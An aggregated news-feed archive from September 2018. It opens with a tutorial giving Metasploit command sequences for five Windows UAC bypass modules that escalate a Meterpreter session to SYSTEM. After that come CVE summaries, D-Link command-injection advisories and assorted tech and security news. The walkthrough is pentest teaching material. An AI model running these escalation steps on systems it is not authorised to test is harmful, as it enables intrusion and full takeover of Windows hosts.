Daily Archives: September 15, 2018

Multiple Ways to Bypass UAC using Metasploit

Hello friends!! Today we are shading light on User Account Control shortly known as UAC. We will also look how it can potentially protect you from malicious software and ignoring UAC prompt can trouble your system.

Table of content

Introduction to UAC

What is UAC?

Working of UAC

5 ways to Bypass UAC

  1. Windows Escalate UAC Protection Bypass
  2. Windows Escalate UAC Protection Bypass (In Memory Injection)
  3. Windows UAC Protection Bypass (Via FodHelper Registry Key)
  4. Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
  5. Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

Introduction to User Account Control

What is User Account Control?

A well-structured User Account Control introduced with Microsoft’s Windows Vista and Windows Server 2008 operating systems to prevent unwanted system-wide changes in a way that is foreseen and requires minimal effort.

In other words it is a security feature of Windows which supports I preventing unauthorized modifications to the operating system UAC makes sure that the certain changes are made only with authorization from the administrator. If the changes are not permitted by the administrator, they are not executed, and Windows remains unchanged.

How does UAC work?

UAC works by preventing a program from carrying out any tasks which involve system changes/specific tasks. The operations which will not work unless the process attempting to carry them out is running with administrator rights. If you run a program as administrator, it will have more privileges since it would be “elevated”, compared to the programs running which are not running as administrator.

Some things which cannot be done without administrator rights:

  • Registry modifications (if the registry key is under e.g. HKEY_LOCAL_MACHINE (since it affects more than one user) it will be read-only)
  • Loading a device driver
  • DLL injection
  • Modifying system time (clock)
  • Modifying User Account Control settings (via Registry, it can be enabled/disabled but you need the correct privileges to do this)
  • Modify protected directories (e.g. Windows folder, Program Files)
  • Scheduled tasks (e.g. to auto-start with administrator privileges)

UAC won’t just automatically block malicious software, the purpose wasn’t to determine if a program is malicious or not. It’s down to the user just as much. If a program is going to be executed with administrator privileges, the user will be alerted and will need to provide confirmation. 

https://malwaretips.com/threads/why-uac-is-important-and-how-it-can-protect-you.47157/

5 Ways to Bypass UAC

Firstly exploit the target machine to obtain the meterpreter. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getsystem

getuid

If you don’t have system/admin authorities and privileges. Then you should go for bypass UAC Protection of targeted system.

Windows Escalate UAC Protection Bypass

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac
msf exploit windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getuid

Great!! Here we got NT AUTHORITY\SYSTEM Privilege, now if you will type “shell” command, you will get access of command prompt with administrator privilege.

Windows Escalate UAC Protection Bypass (In Memory Injection)

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getuid

Ultimately you will get NT AUTHORITY\SYSTEM Privilege, now if you will run “shell” command, you will get access of command prompt with administrator privilege.

Windows UAC Protection Bypass (Via FodHelper Registry Key)

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getprivs

Great!! Here we got NT AUTHORITY\SYSTEM Privilege, now if you will type “shell” command,  you will get access of command prompt with administrator privilege.

Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)

This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getuid

And again you will get NT AUTHORITY\SYSTEM Privilege.

Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation. This module requires the architecture of the payload to match the OS, but the current low-privilege Meterpreter session architecture can be different. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. This module invokes the target binary via cmd.exe on the target. Therefore if cmd.exe access is restricted, this module will not run correctly.

msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getuid

Finally you will get NT AUTHORITY\SYSTEM Privilege, now if you will again run “shell” command then you will get access of command prompt with administrator privilege and this way we can help of Metasploit post exploit to bypass UAC protection.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Multiple Ways to Bypass UAC using Metasploit appeared first on Hacking Articles.

Research Proving People Don’t RTFM, Resent ‘Over-Featured’ Products, Wins Ig Nobel Prize

An anonymous reader writes: Thursday the humor magazine Annals of Improbable Research held their 28th annual ceremony recognizing the real (but unusual) scientific research papers "that make people laugh, then think." And winning this year's coveted Literature prize was a paper titled "Life Is Too Short to RTFM: How Users Relate to Documentation and Excess Features in Consumer Products," which concluded that most people really, truly don't read the manual, "and most do not use all the features of the products that they own and use regularly..." "Over-featuring and being forced to consult manuals also appears to cause negative emotional experiences." Another team measured "the frequency, motivation, and effects of shouting and cursing while driving an automobile," which won them the Ig Nobel Peace Prize. Other topics of research included self-colonoscopies, removing kidney stones with roller coasters, and (theoretical) cannibalism. "Acceptance speeches are limited to 60 seconds," reports Ars Technica, "strictly enforced by an eight-year-old girl nicknamed 'Miss Sweetie-Poo,' who will interrupt those who exceed the time limit by repeating, 'Please stop. I'm bored.' Until they stop." You can watch the whole wacky ceremony on YouTube. The awards are presented by actual Nobel Prize laureates -- and at least one past winner of an Ig Nobel Prize later went on to win an actual Nobel Prize.

Read more of this story at Slashdot.

Germany Responds To Russian Hybrid Warfare With Improved Military Cyber Capabilities | German Chancellor, Angela Merkel, NATO, russia, germany, :: News :: Africa Independent Television – AIT

aitonline.tv - Merkel Made This Public While Speaking With German Troops Stationed In Lithuania As Part Of A NATO Force Deployed To Deter Russia. NATO Allies Have Accused Russia Of Using "Hybrid Warfare" Techniques…


Tweeted by @AIT_Online https://twitter.com/AIT_Online/status/1041159739457978368

CVE-2018-17075

The html package (aka x/net/html) before 2018-07-13 in Go mishandles "in frameset" insertion mode, leading to a "panic: runtime error" for html.Parse of <template><object>, <template><applet>, or <template><marquee>. This is related to HTMLTreeBuilder.cpp in WebKit.

CVE-2018-16554

The ProcessGpsInfo function of the gpsinfo.c file of jhead 3.00 may allow a remote attacker to cause a denial-of-service attack or unspecified other impact via a malicious JPEG file, because of inconsistency between float and double in a sprintf format string during TAG_GPS_ALT handling.

Does LinkedIn Suck?

"LinkedIn Sucks" writes TechCrunch's John Biggs: I hate LinkedIn . I open it out of habit and accept everyone who adds me because I don't know why I wouldn't. There is no clear benefit to the social network. I've never met a recruiter on there. I've never gotten a job. The only messages I get are spam from offshore dev teams and crypto announcements. It's like Facebook without the benefit of maybe seeing a picture of someone's award-winning chili or dog. I understand that I'm using LinkedIn wrong. I understand I should cultivate a salon-like list of contacts that I can use to source stories and meet interesting people. But I have my own story-sourcing tools and my own contacts. It's not even good as a broadcast medium.... LinkedIn is a spam garden full of misspelled, grunty requests from international software houses that are looking, primarily, to sell you services. Because it's LinkedIn it's super easy to slip past any and all defenses against this spam.... I know people have used LinkedIn to find jobs. I never have. I know people use LinkedIn to sell products. It's never worked for me. The article ends with advice for people trying to contact him on LinkedIn for promotional purposes. "LinkedIn isn't a game. It isn't an alternative to MailChimp. It's a conversational tool. Use it that way." But what do Slashdot's readers think? Is LinkedIn a valuable resource for finding recruiters and job offers, interesting perspectives, and updates on your friends' careers? Or does LinkedIn suck?

Read more of this story at Slashdot.

E Hacking News – Latest Hacker News and IT Security News: Indian Air Force online exam hacked





A team of tech-savvy fraudsters hacked into an online exam for selection of non-commissioned  Indian Air force (IAF) officers in Rohtak.

While on Saturday, Rohtak police have arrested two people for allegedly hacking.

According to Jagbir Singh, the SHO of Rohtak city police station, the exam was held from September 13 to 16, and there are five computers that were hacked.

The exam was conducted by an agency which was outsourced by Centre for Development of Advanced Computing,  Singh said. The fiber cable of the exam center was laid from the first floor of an adjacent private hospital, he said.

The fraudsters were able to establish a remote access to computers used in the exam by setting up a parallel network. The team was helping candidates by giving them answers to the questions even they were just sitting idle in front of their computers.

The five hackers were found sitting with their laptops and sending exam questions to experts, the SHO said.

“Two men, who have been identified as masterminds of the entire racket and ran the exam center, are on the run,” said Singh. “They are J S Dahiya, a retired principal of the Jhajjar ITI, and his partner Sanjay Ahlwat, who runs a competitive exams’ coaching center."

However, the exact number of beneficiaries are not known, but the accused men charged between Rs 3.5 lakh and Rs 6 lakh from each candidate. 


E Hacking News - Latest Hacker News and IT Security News

Indian Air Force online exam hacked





A team of tech-savvy fraudsters hacked into an online exam for selection of non-commissioned  Indian Air force (IAF) officers in Rohtak.

While on Saturday, Rohtak police have arrested two people for allegedly hacking.

According to Jagbir Singh, the SHO of Rohtak city police station, the exam was held from September 13 to 16, and there are five computers that were hacked.

The exam was conducted by an agency which was outsourced by Centre for Development of Advanced Computing,  Singh said. The fiber cable of the exam center was laid from the first floor of an adjacent private hospital, he said.

The fraudsters were able to establish a remote access to computers used in the exam by setting up a parallel network. The team was helping candidates by giving them answers to the questions even they were just sitting idle in front of their computers.

The five hackers were found sitting with their laptops and sending exam questions to experts, the SHO said.

“Two men, who have been identified as masterminds of the entire racket and ran the exam center, are on the run,” said Singh. “They are J S Dahiya, a retired principal of the Jhajjar ITI, and his partner Sanjay Ahlwat, who runs a competitive exams’ coaching center."

However, the exact number of beneficiaries are not known, but the accused men charged between Rs 3.5 lakh and Rs 6 lakh from each candidate. 

Bitcoin Could Have Smooth Sailing from Here, Technical Oscillator Suggests

While the Ethereum price is only beginning to show signs of recovery, the bitcoin price has managed to hold above key support in the wake of industry setbacks. When the bitcoin price jumped from $6,300 to $6,500 a few days ago, the whole market was watching, including Michael Novogratz, founder of Galaxy Digital.  He was […]

The post Bitcoin Could Have Smooth Sailing from Here, Technical Oscillator Suggests appeared first on Hacked: Hacking Finance.

The Basics of Cyber Warfare: Understanding the Fundamentals of Cyber Warfare in Theory and Practice – CyberWar

tobem.com - As part of the Syngress Basics series, The Basics of Cyber Warfare provides readers with fundamental knowledge of cyber warfare in both theoretical and practical aspects. This book explores the battl…


Tweeted by @CyberToolsBooks https://twitter.com/CyberToolsBooks/status/1041112758488580096

To Fight Climate Change, California Says ‘We’re Launching Our Own Damn Satellite’

An anonymous reader quotes the Los Angeles Times: Jerry Brown closed his climate summit in San Francisco on Friday with a dramatic announcement: California will launch its own satellite into orbit to track and monitor the formation of pollutants that cause climate change. "With science still under attack and the climate threat growing, we're launching our own damn satellite," Brown said in prepared remarks. "This groundbreaking initiative will help governments, businesses and landowners pinpoint -- and stop -- destructive emissions with unprecedented precision, on a scale that's never been done before...." The state will develop the satellite with the San Francisco-based Earth-imaging firm Planet Labs, a company founded by former NASA scientists in 2010. The state may ultimately launch multiple satellites into space, according to the governor's office.... Robbie Schingler, co-founder of Planet Labs, said the project will inform "how advanced satellite technology can enhance our ability to measure, monitor, and ultimately, mitigate the impacts of climate change..." Brown's announcement came in quickly delivered remarks at the close of the three-day gathering and received a standing ovation from many in the audience. Governors from 17 states (and from both political parties) also pledged to spend $1.4 billion to lower auto emissions, using money from Volkwagen's legal settlement over falsifying clean-air performance data. New York City also announced that its pension fund would invest $4 billion in companies offering climate change solution over the next three years. And 26 states, cities and businesses said they'd procure non-polluting vehicle fleets by 2030, while ChargePoint and EV Box pledged to build 3.5 million new charging stations around the world.

Read more of this story at Slashdot.

Uber Glitch Stops Payments To Drivers, Prices Surge

Uber is still trying to fix a glitch that's been stopping its drivers from collecting the money they've earned for several days. An anonymous reader writes: One Uber driver says the problem's lasted over a week, and he's owed more than $1,300. "They've been continually telling us that it would be corrected within 24 hours," he told a Bay Area news station. "We still can't access the money.... We're in a situation where for a lot of us we have bills every day, we pay tolls every day, we pay gas every single day." Now the San Diego Reader reports the issue "is forcing San Diego drivers off the road," with the shortage of drivers triggering surge pricing throughout the entire region as much as triple the usual rate. Surge pricing is also hitting riders in Dallas, according to another Uber driver's tweet, who complains "It's a shame that a $48 billion 'tech' company can't get it together. In a statement promising they'd still pay all their drivers, Uber acknowledged their payment system was still broken, "and we sincerely regret any inconvenience." "The glitch in the payment system also means that trip and safety issues are unable to be reported, either by the passenger, or the driver," notes the San Diego Reader, adding that the city's Uber's drivers "continue to decline to work, either staying off the road of switching to another ride-sharing service."

Read more of this story at Slashdot.

Virtual Land Sales Increase as Decentraland (MANA) Climbs 38%

Decentraland (MANA) climbed 38% against the dollar in the three days since September 12th, and the sudden rise coincides with a marked increase in purchases of digital real estate on Decentraland’s blockchain. In the past twenty-four hours just under $117 million worth of LAND has been bought and sold on Decentraland, equating to just over […]

The post Virtual Land Sales Increase as Decentraland (MANA) Climbs 38% appeared first on Hacked: Hacking Finance.

58% of Silicon Valley Tech Workers Delayed Having Kids Because of Housing Costs

An anonymous reader quotes the Mercury News: Though some residents blame the area's highly paid tech workers for driving up the cost of housing, data increasingly shows that these days, even tech workers feel squeezed by the Bay Area's scorching prices. Fifty-eight percent of tech workers surveyed recently said they have delayed starting a family due to the rising cost of living, according to a poll that included employees from Apple, Uber, Google, LinkedIn, Facebook, Lyft, and other Bay Area companies. The recently released poll, was conducted by Blind, an online social network designed to let people share anonymous opinions about their workplaces. Blind surveyed 8,284 tech workers from all over the world, with a large focus on the Bay Area and Seattle. Blind spokeswoman Curie Kim said the findings were "really surprising. In the Bay Area, tech employees are known to make one of the highest salaries in the nation," she said, "but if these people also feel that they can't afford housing and they can't start a family because of the rising cost of living, who can....?" The average base salary for a software engineer at Apple is $121,083 a year, the article notes, yet the company also had the largest percentage of surveyed tech employees who said they'd been force to delay starting their families -- 69%. "Anywhere else in the country, we'd be successful people who owned a home and didn't worry about anything," said one 34-year-old in a two-income family. "But here, that's not the case." While her husband helps Verizon deploy smart devices with IoT technology, they're raising two daughters in a rented Palo Alto apartment, "only to experience a $500 rent increase over two years."

Read more of this story at Slashdot.

CVE-2018-17066

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction in the handler function of the /goform/form2systime.cgi route. This could lead to command injection via shell metacharacters in the datetime parameter.

CVE-2018-17068

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction in the handler function of the /goform/Diagnosis route. This could lead to command injection via shell metacharacters in the sendNum parameter.

CVE-2018-17063

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction within the handler function of the /goform/NTPSyncWithHost route. This could lead to command injection via shell metacharacters.

CVE-2018-17064

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction within the handler function of the /goform/sylogapply route. This could lead to command injection via the syslogIp parameter after /goform/clearlog is invoked.

CVE-2018-17065

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. Within the handler function of the /goform/DDNS route, a very long password could lead to a stack-based buffer overflow and overwrite the return address.

Slashdot Asks: Have You Ever Gotten Someone Else’s Email?

Wave723 shares an article from IEEE's Spectrum: I was scrolling through emails on my phone one recent morning when a strange message appeared among the usual mix of advertisements and morning newsletters. It was a confirmation for an upcoming doctor's appointment in New York City, but came from an address I'd never seen before. And at the top, there was a friendly note: "I guess this is for you :)" The note, I would later learn, was written by a Norwegian named Andre Nordum whose email address is just a few letters different from my own... he'd Googled my name to try to track down my personal email address and forward the message to me. All day, I thought about Andre's act of digital kindness and the heartwarming fact that a stranger had spent time and effort trying to send me a bit of important information. I also felt a twinge of guilt: I'd received emails in the past -- from car dealerships and daycares -- that were clearly meant for other people, and I'd never forwarded any of them along. The 33-year-old Norwegian banker later joked that he did it because "I did not want to get emails about your dermatology history for the foreseeable future." But another Norwegian has been returning mis-directed emails for over a decade with mundane stories about the family dog and games of pickleball -- meant for another E. Nordrum. "It's a little bit like sitting on the bus or overhearing somebody in the restaurant or something," he says, admitting that when they finally stopped coming, "I was a little bit sad, actually." In 2017 the other E. Nordrum flew from America to Norway on a vacation, finally meeting the man who'd been returning all his mis-addressed emails -- and they ended up talking for hours. The article calls it a reminder "of how downright pleasant it can sometimes be to interact with strangers on the Internet." But it also asks an interesting question: "Do these email mix-ups happen to everyone? " I know I'm still getting emails about a storage space somebody opened 1300 miles away. And Slashdot reader antdude writes, "A few days ago, I got an USC.edu's doctor email (CCed with a few other people) about an upcoming surgery for a transplant. I was like huh?" How about the rest of Slashdot's readers. Have you ever gotten someone else's email?

Read more of this story at Slashdot.

Crypto Update: Ethereum Hits 9-day High as Altcoin Bounce Continues

The cryptocurrency segment continued to show signs of short-term strength so far this weekend with the severely oversold altcoins leading the way higher. Ethereum is still in the epicenter of the moves, with the second largest coin pushing higher towards the $235 resistance level as expected. Despite the ongoing bounce, several coins are stuck in […]

The post Crypto Update: Ethereum Hits 9-day High as Altcoin Bounce Continues appeared first on Hacked: Hacking Finance.

Apache Struts & SonicWall’s GMS exploits key targets of Mirai & Gafgyt IoT malware

By Waqas

Security researchers at Palo Alto Networks’ Unit 42 have discovered modified versions of the notorious Mirai and Gafgyt Internet of Things (IoT) malware. The malware have the capability of targeting flaws that affect Apache Struts and SonicWall Global Management System (GMS). Moreover, the Unit 42 researchers also discovered new versions of Mirai and Gafgyt (aka BASHLITE) […]

This is a post from HackRead.com Read the original post: Apache Struts & SonicWall’s GMS exploits key targets of Mirai & Gafgyt IoT malware

Disproportionate Impact of Cyber Espionage in the Global South: India’s Aadhaar Database – Berkeley Journal of International Law Blog

berkeleytravaux.com - By: Anupriya Dhonchak and Shubhangi Agarwalla Recently, a Committee of Experts set up in India to draft a law for data protection in the country after enunciation of the right to privacy by the India…


Tweeted by @BerkeleyIntLaw https://twitter.com/BerkeleyIntLaw/status/1041049641343758336

Quantum Experiment Confirms Causality Is Fuzzy

"An experiment has confirmed that quantum mechanics allows events to occur with no definite causal order," reports an article shared by long-time Slashdot readers UpnAtom and jd. Researchers at the University of Queensland in Australia believe this could link Einstein's general theory of relativity to quantum mechanics, according to Physics World: In classical physics -- and everyday life -- there is a strict causal relationship between consecutive events. If a second event (B) happens after a first event (A), for example, then B cannot affect the outcome of A. This relationship, however, breaks down in quantum mechanics because the temporal spread of a particles's wave function can be greater than the separation in time between A and B. This means that the causal order of A and B cannot be always be distinguished by a quantum particle such as a photon. In their experiment, Romero, Costa and colleagues created a "quantum switch", in which photons can take two paths. One path involves being subjected to operation A before operation B, while in the other path B occurs before A. The order in which the operations are performed is determined by the initial polarization of the photon as it enters the switch.... The team did the experiment using several different types of operation for A and B and in all cases they found that the measured polarization of the output photons was consistent with their being no definite causal order between when A and B was applied. Indeed, the measurements backed indefinite causal order to a whopping statistical significance of 18 -- well beyond the 5 threshold that is considered a discovery in physics. Science Magazine applauds the experiments for "obliterating our common sense notion of before and after and, potentially, muddying the concept of causality.

Read more of this story at Slashdot.

Cryptomining malware infects Windows and Linux Kodi users



(Image source: Techradar.com)
Word is that the users of Kodi media player who had add-ons from the Bubbles, Gaia, and XvBMC repositories installed on their systems might have been affected with a coin miner. 

As discovered by ESET (cyber-security firm), users of Kodi, and the free and open-source media player software application which has continuously evolved over time and spawned a community of its own has been one of the many targets of a malware campaign.

Reports on ZDNet elucidate the findings of company’s malware analysts who detected that a minimum of three popular repositories of Kodi add-ons have been infected and assisted the fostering of a malware strain which covertly mined cryptocurrency on users’ computers.

For those who find the sound of ‘Kodi’ still foreign, it is an “empty” media player which functions fundamentally on add-ons. After installing Kodi, users add the URL of the add-on repositories of their preference and then from there they select which add-on to install on their players.

Though the player is predominantly used for streaming pirated content, the add-ons permit streaming everything from YouTube to Netflix.
As deduced by ESET researchers, the three aforementioned add-on repositories stations malicious code which sets into motion the download of a second Kodi add-on and as the newly downloaded Kodi add-on contains a code to fingerprint the user’s OS to later install a cryptocurrency miner, the malicious procedure comes to a noxious conclusion.
However Kodi is available for various platforms, researchers said that the programmers of this malign cryptocurrency mining program have only configured a miner for Linux and Windows users. According to the fragmented data obtained by ESET, crooks mined for Monero and affected over 4,700 users – accumulating over 62 Monero coins worth $7,000.
Countries with a high percentage of Kodi users are, as a matter of fact, the most affected ones as well, to name a few- UK, Israel, US, Netherlands, and Greece,
On the solution front, there’s no concrete way of detecting the infection but users are advised to have antivirus software installed and updated. Besides that, a high CPU usage is a probable hint of the attack as it is a common indicator of cryptocurrency mining operations.

Two Years Ago — UK Report : Libyan Intervention Based on Erroneous Assumptions; David Cameron Ultimately Responsible

gosint.wordpress.com - “We were dragged along by a French enthusiasm to intervene, and the mission then moved from protecting people in Benghazi, who arguably were not at the kind of threat that was then being presented… I…


Tweeted by @mohandeer https://twitter.com/mohandeer/status/1041041974801903617

Cryptocurrency App Mocks Competitor For Getting Hacked. Gets Hacked 4 Days Later

An anonymous reader writes: A hacker going online by the pseudonym of "aabbccddeefg" has exploited a vulnerability to steal over 44,400 EOS coins ($220,000) from a blockchain-based betting app. The hack targeted a blockchain app that lets users bet with EOS coins in a classic dice game. The entire incident is quite hilarious because four days before it happened, the company behind the app was boasting on Twitter that every other dice betting game had been hacked and lost funds. "DEOS Games, a clone and competitor of our dice game, has suffered a severe hack today that drained their bankroll," the company said in a now deleted tweet. "As of now every single dice game and clone site has been hacked. We have the biggest bankroll, the best developers, and a superior UI. Play on." While the hack is somewhat the definition of karma police, it is also quite funny because the hacker himself didn't really care about hiding his tracks or laundering the stolen funds. "So this guy hacks EOSBET and what does he do? Play space invaders. I'm not even kidding...," a user analyzing the hacker's account said.

Read more of this story at Slashdot.

[News] US: China hacking ‘repeatedly raised at highest level’

The US says it has repeatedly raised concerns with Beijing about cyber theft, as a report linked a hacking group with a Chinese military unit. While not commenting directly on the report, a White House spokesman called cyber theft a "major challenge" in the national security arena. The report identified a Shanghai high-rise used by the military as the likely home of a prolific hacking group. China's Defence Ministry has denied any role in hacking. Cyber sabotage, including hacking, was banned, China Daily quoted the ministry as saying, sentiments echoed by Foreign Ministry spokesman Hong Lei.

[News] New Mac malware opens secure reverse shell

A new backdoor Trojan for OS X is making the rounds, attempting to set up a secure connection for a remote hacker to connect through and grab private information. The malware, dubbed "Pintsized" by Intego, is suspected of using a modified implementation of OpenSSH to set up a reverse shell that creates a secure connection to a remote server. The use of an encrypted connection makes it more difficult to detect and trace, especially since it uses the common SSH protocol. In addition, the malware attempts to hide itself by disguising its files to look like components of the OS X printing system, specifically the following: com.apple.cocoa.plist cupsd (Mach-O binary) com.apple.cupsd.plist com.apple.cups.plist com.apple.env.plist

[News] Apple Breached by Facebook Hackers Using Java Exploit

Apple is the latest major American company to enter the security confessional and disclose it has been breached. The company told Reuters today it was attacked by the same crew that hit Facebook, which disclosed its breach last Friday, and that like the social media giant, no data had been stolen. In both cases, a Java zero-day vulnerability had been exploited by attackers, in this case, to gain access to Apple machines. Reuters is reporting that the same attack was used against other Mac computers at hundreds of companies, including some in the defense industrial base. "Apple has identified malware which infected a limited number of Mac systems through a vulnerability in the Java plug-in for browsers. The malware was employed in an attack against Apple and other companies, and was spread through a website for software developers," said Reuters, quoting a statement from Apple. "We identified a small number of systems within Apple that were infected and isolated them from our network. There is no evidence that any data left Apple.”

[News] Botnet master abuses Facebook for pocket money, researchers reveal

A Chinese hacker's main job may well be running a botnet of malware-clotted zombie PCs, but there's always time left in the day for selling fake Likes, apparently. It is not every day that remorseful confessions over lapsed adherence to the Five Precepts of Buddhism help researchers identify a hacker. In early 2012, hacker Zhang Changhe admitted, on Chinese social network Kaixin001, to breaking all Five Precepts of Buddhism. Sexual misconduct, lying, and drinking aside, Zhang Changhe wrote that he also stole "continuously and shamelessly," though he hoped that he could stop stealing in the future. Turns out that Zhang Changhe runs a botnet. (Perhaps that is what he was alluding to when he spoke of stealing "continuously and shamelessly"?) Two security researchers, Dell SecureWorks's Joe Stewart and a 33-year-old blogger called "Cyb3rsleuth", claim that Zhang Changhe also reportedly works for the Chinese army and teaches at PLA Information Engineering University, a center for electronic intelligence, comparable to the US's National Security Agency's university.

[News] Apple, Facebook, Twitter hacks said to hail from Eastern Europe

While many security experts have been pointing the blame at China for the recent wave of cyberattacks on U.S. companies and newspapers, Bloomberg reports that some of the malware attacks actually may be coming from Eastern Europe. Investigators familiar with the matter told Bloomberg they believe a cybercriminal group based in either Russia or Eastern Europe is carrying out the high-level attacks to steal company secrets, research, and intellectual property, which could then be sold on the black market. Evidence that the attacks may be coming from Eastern Europe is the type of malware being used by the hackers, which is more commonly used by cybercriminals than by government spying. Also, investigators have tracked at least one server being used by the hackers to a Ukrainian hosting company.

[News] Firefox 19 Fixes HTTPS Phishing Issue, Adds Built-In PDF Viewer

Mozilla has released Firefox 19, the latest version of its flagship browser, which includes not only fixes for a number of serious security vulnerabilities but also a built-in PDF viewer. The native PDF viewer in Firefox could help protect against some of the ongoing attacks that use vulnerabilities in Adobe Reader and other PDF readers as infection vectors. Attackers have been preying on Reader and Acrobat vulnerabilities for several years now, although the sandbox that Adobe added to Reader X and later versions has helped protect users against many exploits. Just last week, though, the first confirmed Reader sandbox escape exploit surfaced. Adobe patched that vulnerability on Tuesday. Mozilla officials said the inclusion of the built-in PDF viewer should make life a little easier for Firefox users when they encounter a PDF on a site.

[News] Apple patches the Java hole its own developers fell into – eventually

Shortly after admitting that its own techies got infected thanks to a Java hole, Apple has pushed out a Java update for the rest of us. Bit of a pity that the Fruity Ones didn't do this back at the beginning of February, when Oracle's emergency "pre-Patch-Tuesday" update came out to fix the hole that Apple is only now closing off. Apple therefore bumps its Java distribution from 1.6.0_37 to 1.6.0_41, leapfrogging OS X 10.7 and 10.8 users past 1.6.0_39 entirely (the even numbers weren't used for official releases). This re-aligns Apple's version with Oracle's own recent patch, which came out on 19 February 2013 as scheduled.

[News] Biometric USB password key worthy of ‘Mission: Impossible’

I hate to use the term "sexy" to describe a gadget, but if the myIDkey isn't "sexy," at least it's "damn fine." It takes the concept of a USB drive that protects all your passwords and does it up right with voice-activated search, biometric fingerprint identification, and Bluetooth. Making a USB password protection device sound exciting? That's pretty hot. I'm not the only person who thinks myIDkey is worth a look. It just launched its Kickstarter project and already has pulled in more than $87,000 (and rising fast) toward its $150,000 goal. A $99 pledge gets you a myIDkey with two different protective sleeves. Like most other USB password keys, you can plug myIDkey into a computer and it will auto-complete your information into pertinent forms. You can also store documents and files on it like a regular USB drive. What's cooler, though, is the voice-search function. Say the name of your bank, for example, and the key will show the information on an OLED display. Not just anyone can talk to the key and get results, though. You first have to unlock it by swiping your finger.

[News] Why encryption doesn’t solve the data sovereignty debate

There is a long-standing argument that encrypting all data sent to the cloud could make the data sovereignty debate irrelevant, enabling Australian companies to make use of cheaper, offshore clouds. The basis of the argument is that data, once encrypted, is random and cannot be read, so the problem is shifted toward the issue of key management — which can be solved by ensuring that keys remain onshore. But security vendors Trend Micro and Sophos, and systems integrator CSC, have argued that encrypting everything isn't necessarily the answer for everyone, and that doing so would come at too high a cost. At a media briefing, Trend Micro vice president for Data Centre and Cloud Security Bill McGee stated that encryption brings about additional challenges that have flow-on effects in terms of scaling a cloud solution, and the financial implications that brings.

[News] McAfee finds sophisticated attacks targeting other ‘critical sectors’ of the economy

Financial services has been a favorite target for sophisticated attacks in the last few years, but cyber criminals are moving on to other "critical sectors of the economy," according to McAfee. In the security giant's fourth quarter threats report, researchers highlighted some of the new schemes being used in this regard and other high-profile attacks, including advanced persistent threats (APTs) such as Operation High Roller and Project Blitzkrieg. Both of these methods attack financial services infrastructures, with the former aimed at manufacturing and import/export firms in the United States and Latin America, while Blitzkrieg hits both consumers and their banks through illicit electronic fund transfers. Vincent Weafer, senior vice president of McAfee Labs, explained in the report why many of these cyber criminals are becoming more interested in government, manufacturing and commercial transaction infrastructure targets.

GrrCon 2017 – Threat Intelligence: Zero to Basics in presentation

This is an audience participation talk, on going from having DFIR with no Threat Intelligence to building a basic threat intelligence program. The majority of the data needed to start a Threat Intelligence program is probably already being captured by the DFIR program, and this talk is about taking that data, putting context around it to make it information, and then make that into something actionable (intelligence). Attendees of this talk should be able to go back to the office after the conference and enhance their IR programs with Threat Intelligence. The presentation will show what Threat Intelligence is and how to collect the data from their own networks. The talk will cover why the majority Threat Intelligence shouldn,t be paid for until later in the program, while discussing the few things that should be paid for at the start. In parts of the talk Attendees will help pick the data points to capture, and work through the Alternative Competing Hypotheses to figure out the most likely reason for the event / incident. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

